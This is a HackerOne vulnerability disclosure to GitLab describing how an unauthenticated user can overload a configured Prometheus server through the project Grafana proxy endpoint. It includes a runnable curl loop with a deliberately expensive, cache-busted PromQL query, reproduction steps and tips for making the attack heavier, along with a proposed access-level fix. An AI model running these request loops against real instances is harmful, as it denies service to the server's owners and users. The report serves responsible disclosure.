DOS and high resource consumption of Prometheus server through abuse of Grafana integration proxy endpoint
HackerOne report #1723106 by joaxcar on 2022-10-04, assigned to GitLab Team
Report
As I previously mentioned in my report on path traversal in the Grafana integration, an unauthenticated user can DOS the configured Prometheus server by sending heavy PromQL queries to the https://gitlab.example.com/group1/project1/-/grafana/proxy/ endpoint. As this issue was not addressed by the patch for the path traversal, I thought that I might as well report it separately.
Summary
I am no Prometheus expert, so the described scenario can probably be expanded and improved upon (from a DoS perspective). But I did force my docker container with 16 cores to run at a constant 100% CPU with only 20 requests (the requests are asynchronous, meaning that the connection from the attacker to GitLab will succeed, while the connection between GitLab and Prometheus will persist). When the attack was executed, I could not restart Prometheus from the terminal with gitlab-ctl stop prometheus as the service was unresponsive, and a gitlab-ctl restart did not fix it. I had to stop the docker container to make it stop. The impact of the attack depends somewhat on the amount of data on the Prometheus server, but as I only tested this on my localhost GitLab Prometheus server, it is almost empty compared to real-life servers.
The setup
I booted up a GitLab Omnibus instance in a docker container. This includes a Grafana instance (https://gitlab.example.com/-/grafana) and a Prometheus instance (http://localhost:9090). I also configured SSL and a DNS record for my server (spoofed with the hosts file).
The Grafana instance already has the Prometheus instance as a datasource, so it's possible to use this instance for test purposes. I then configured the Grafana integration in a public project, following https://docs.gitlab.com/ee/operations/metrics/embed_grafana.html .
Let's say that the project is located at https://gitlab.example.com/group1/project1; then the proxy endpoint is located at https://gitlab.example.com/group1/project1/-/grafana/proxy/ . This -/grafana/proxy has nothing to do with the Grafana instance in Omnibus; they just look similar. The datasource ID for Prometheus will probably be either 1 or 2.
You might need to run the server for a while to have some data in Prometheus. After a fresh boot, I used Burp to perform a scan against my localhost GitLab instance to fill up the server with HTTP requests. I did this twice, 24 hours apart.
The attack
As an unauthenticated user, I can now DOS the Prometheus server (and possibly also affect the overall system state of the docker instance) by running this command in a terminal:
for index in {1..20}
do
curl 'https://gitlab.example.com/group1/project1/-/grafana/proxy/2/api/v1/query_range?query=min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100'$index'h%5D)))&start_time=1654749435&end_time=1654771035&step=15'
done
To get it working, you might need to modify start_time and end_time to something relevant (use date +%s in a terminal to get the current timestamp). Also, the ID after grafana/proxy/ needs to match the ID of the Prometheus datasource in Grafana. If 20 requests are not enough, try increasing the number.
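As a rough illustration of the timestamp adjustment described above, the following sketch derives a start_time/end_time pair from the current time. The timestamps in the command span 1654771035 - 1654749435 = 21600 seconds (6 hours). The helper names query_window and step_count are hypothetical and not part of GitLab or Prometheus. The step count assumes that a range query is evaluated at start, start + step, and so on up to end.

```shell
#!/usr/bin/env bash
# Hypothetical helpers for adjusting the query window; not part of any GitLab tooling.

# Print "start_time end_time" for a window of the given length (seconds)
# ending at the given Unix timestamp (defaults to now, via date +%s).
query_window() {
  local window_seconds=$1
  local end_time=${2:-$(date +%s)}
  printf '%s %s\n' "$(( end_time - window_seconds ))" "$end_time"
}

# Number of evaluation points per series for a window and step,
# assuming evaluation at start, start + step, ..., up to end.
step_count() {
  local window_seconds=$1 step_seconds=$2
  printf '%s\n' "$(( window_seconds / step_seconds + 1 ))"
}

# Same 6-hour window as in the report, but ending now.
window=$(query_window 21600)
start_time=${window% *}
end_time=${window#* }
echo "start_time=${start_time}&end_time=${end_time}&step=15"
echo "evaluation points per series: $(step_count 21600 15)"
```

The printed parameter string can replace the start_time, end_time and step part of the URL in the command above.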
In the docker image, run htop or top to monitor the CPU.
Some details
Pulled apart, the anatomy of a request looks like this:
https://gitlab.example.com/group1/project1/-/grafana/proxy <-- The project proxy endpoint
/2/api/v1/query_range <-- API call to Prometheus through Grafana proxy
?query= <-- Start of query
<-- An expensive query, just a mess that I made up trying to eat resources -->
min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100
$index <-- Index used as cache buster
h%5D)))&start_time=1654749435&end_time=1654771035&step=15
It is important to note that the query is arbitrary. I just tried to construct one that was heavy enough to tilt the server, and it could probably be made much heavier. Also note the use of index in the query. This is a "cache buster", which is needed because the GitLab backend will not run multiple commands against Prometheus if the query is identical.
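To make the encoded query easier to read, here is a minimal sketch that percent-decodes it for a few index values. The functions urldecode and encoded_query are hypothetical helpers written for this illustration. The decoding relies on bash's printf %b interpreting \xHH escapes, so it is bash-specific.

```shell
#!/usr/bin/env bash
# Hypothetical helpers for reading the query; bash-specific.

# Decode percent-encoding by turning each %HH into \xHH for printf %b.
urldecode() {
  printf '%b\n' "${1//%/\\x}"
}

# The encoded query from the report with the cache-busting index spliced in.
encoded_query() {
  local index=$1
  printf '%s' \
    'min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100' \
    "$index" \
    'h%5D)))'
}

# Each index yields a different range selector, so no two queries are identical.
for index in 1 2 3; do
  urldecode "$(encoded_query "$index")"
done
```

Because the index is appended directly after 100, the final range selector becomes [1001h], [1002h] and so on, rather than a range of 100 plus the index.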
Result
Here are some images from my test run on my local system:
This is the server's htop output directly after receiving 20 requests from the attacker. All 16 cores are working at 100%.
This is the state of the server 5 minutes later. No additional requests from the attacker have been made.
When accessing Grafana through the web client, I can get an extremely simple request to run. It usually takes about 50 milliseconds to get the response. During the attack it took 1 minute.
Steps to reproduce
(If you have another Grafana instance you can test against, use that one. I will describe the attack with the docker GitLab Omnibus image.)
- Boot up a docker image of the latest GitLab Omnibus (see https://docs.gitlab.com/ee/install/docker.html)
- Follow this guide to enable admin login (and username/password login) on the local Grafana instance: https://docs.gitlab.com/omnibus/settings/grafana.html
- Log in to the new Grafana instance on http://example.gitlab.com as admin
- Create an API key by visiting /-/grafana/org/apikeys. Make sure to generate an Admin key
- Create a new project on the GitLab instance
- Go to http://gitlab.example.com/GROUP/PROJECT/-/settings/operations and expand Grafana integration
- Configure with http://example.gitlab.com/-/grafana and the API key
- Now make sure to load the Grafana instance with some data. Make a bunch of requests to the GitLab instance over a period of time
- Open a terminal and get a shell on the docker image, for example: docker exec -it gitlab /bin/bash
- Run top to monitor the CPU level
- Now open another terminal and run date +%s
- Take the current timestamp and update start_time and end_time in this script
for index in {1..100}
do
curl 'https://gitlab.example.com/group1/project1/-/grafana/proxy/2/api/v1/query_range?query=min_over_time(api_requests_total%5B1000h%5D)%20%25%20max_over_time(http_requests_total%5B1000h%5D)%20%25%20histogram_quantile(0.9%2C%20sum%20by%20(job)%20(rate(http_requests_total%7Bjob%3D~%22.%2B%22%7D%5B100'$index'h%5D)))&start_time=1654749435&end_time=1654771035&step=15'
done
- Run it and watch the CPU in top. If there is enough data in the instance, all processors should spike to 100%
Impact
DOS and high resource consumption on Prometheus server
What is the current bug behavior?
No special permissions are required to run arbitrary queries (as admin, since the Grafana token is an admin token) against a configured Grafana instance.
There are two issues. First, any user with any access to the project can execute arbitrary queries (including unauthenticated users on public projects). Second, as the queries are arbitrary, they can be as complex as the attacker wants and can thus break the Prometheus server. A user can make over 100 requests in one go, and GitLab will gladly pass them along to Grafana. Even though it looks like GitLab has a limit of 20 or so concurrent requests, the rest are run when the others finish.
What is the expected correct behavior?
Users need to be limited in what queries they are allowed to run, or there should be a restriction on who can make the queries.
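One way to picture "limiting what queries are allowed" is a pre-check on the range selectors in a query. The sketch below is purely illustrative and is not how GitLab or Prometheus implements any limit. The function names max_range_hours and query_allowed and the 24-hour threshold are assumptions made for this example. It only recognizes selectors written as [<N>h], so a real check would need a proper PromQL parser.

```shell
#!/usr/bin/env bash
# Hypothetical pre-check, for illustration only: find the largest hour-based
# range selector ([<N>h]) in a PromQL string and compare it to a limit.

max_range_hours() {
  local query=$1 max=0 n
  # Extract every [<N>h] selector, then keep only the number inside it.
  for n in $(printf '%s\n' "$query" | grep -oE '\[[0-9]+h\]' | grep -oE '[0-9]+'); do
    if [ "$n" -gt "$max" ]; then
      max=$n
    fi
  done
  printf '%s\n' "$max"
}

# Succeeds (exit status 0) if no hour-based range exceeds the limit.
query_allowed() {
  local query=$1 limit_hours=$2
  [ "$(max_range_hours "$query")" -le "$limit_hours" ]
}

query='min_over_time(api_requests_total[1000h]) % max_over_time(http_requests_total[1000h])'
if query_allowed "$query" 24; then
  echo "allowed"
else
  echo "rejected: range of $(max_range_hours "$query")h exceeds 24h"
fi
```

A check like this would only address the query-complexity half of the problem. The other half, who is allowed to reach the proxy endpoint at all, is an access-control question.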
Output of checks
This bug happens on GitLab.com
Results of GitLab environment info
[Redacted]
Proposed solution
From #378456 (comment 1194850384):
Elevate access levels to Reporter+ for public projects only, leaving private/protected as-is.